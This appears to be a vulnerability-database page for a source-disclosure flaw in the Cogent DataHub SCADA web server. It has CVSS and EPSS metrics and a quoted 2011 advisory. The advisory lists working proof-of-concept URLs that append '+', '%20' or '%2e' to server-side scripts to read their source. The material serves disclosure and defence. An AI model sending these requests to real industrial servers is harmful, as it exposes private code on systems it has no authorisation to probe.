CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
The web server in Cogent DataHub 7.1.1.63 and earlier allows remote attackers to obtain the source code of executable files via a request with a trailing (1) space or (2) %2e (encoded dot).
Exposure of Sensitive Information to an Unauthorized Actor The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
5
AV:N/AC:L/Au:N/C:P/I:N/A:N
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
4.19%
–
–
2022-04-03
–
–
4.19%
–
–
2022-07-17
–
–
4.19%
–
–
2023-03-12
–
–
–
30.87%
–
2023-04-16
–
–
–
27.13%
–
2023-06-18
–
–
–
17.22%
–
2023-10-08
–
–
–
16.2%
–
2023-12-03
–
–
–
14.05%
–
2024-02-11
–
–
–
5.66%
–
2024-03-03
–
–
–
6.06%
–
2024-03-17
–
–
–
6.7%
–
2024-04-14
–
–
–
5.47%
–
2024-06-02
–
–
–
4.73%
–
2024-09-22
–
–
–
7.43%
–
2024-11-17
–
–
–
7.28%
–
2024-12-22
–
–
–
4.66%
–
2025-01-12
–
–
–
4.66%
–
2025-01-19
–
–
–
4.66%
–
2025-03-18
–
–
–
–
12.89%
2025-03-30
–
–
–
–
9.92%
2025-04-15
–
–
–
–
9.92%
2025-04-15
–
–
–
–
9.92,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Publication date : 2011-09-13 22h00 +00:00 Author : Luigi Auriemma EDB Verified : No
#######################################################################
Luigi Auriemma
Application: Cogent DataHub
http://www.cogentdatahub.com/Products/Cogent_DataHub.html
Versions: <= 7.1.1.63
Platforms: Windows
Bug: source disclosure
Exploitation: remote
Date: 13 Sep 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
DataHub is a software for the SCADA and automation sector.
#######################################################################
======
2) Bug
======
The server/service listens on port 80 using a custom web server.
Through the appending of the following chars it's possible to view the
content of the server-side scripts on the server:
+
%20
%2e
This vulnerability is useful when the server hosts customized scripts
which seems a feature of the software:
http://www.cogentdatahub.com/Features/DataHub_Web_ASP.html
#######################################################################
===========
3) The Code
===========
http://SERVER/index.asp+
http://SERVER/index.asp%20
http://SERVER/index.asp%2e
#######################################################################
======
4) Fix
======
No fix.
#######################################################################